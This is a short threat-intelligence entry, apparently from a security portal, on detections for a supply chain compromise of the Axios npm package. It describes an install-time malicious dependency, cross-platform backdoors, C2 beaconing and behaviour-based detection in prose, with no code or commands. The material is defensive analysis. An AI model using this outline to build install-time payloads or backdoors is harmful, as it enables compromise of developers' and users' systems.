Detections for the Axios supply chain compromise
Essential information
- Published
- 07/04/2026 11:10
- Modified
- 07/04/2026 11:26
- Tags
- 2026-04-07 axios post-install execution supply chain attack
- Related entities
- 9 observables, 18 techniques (mitre), 4 malware, 3 others
Description
A supply chain attack targeting Axios npm package versions 1.14.1 and 0.30.4 introduced a malicious transitive dependency ([email protected]) that executed during installation. The attack deploys cross-platform payloads across Linux, Windows, and macOS through a consistent pattern: Node.js spawns OS-native shells to retrieve and execute remote payloads in detached or hidden contexts. Linux victims receive a Python-based RAT, Windows systems get a PowerShell backdoor with registry persistence, and macOS hosts are compromised with a Mach-O binary backdoor. All variants beacon to the same C2 infrastructure, performing host fingerprinting, process enumeration, filesystem reconnaissance, and arbitrary code execution. The malicious activity is reliably detected through behavioral signatures focusing on unusual Node.js process ancestry and remote payload retrieval rather than static indicators.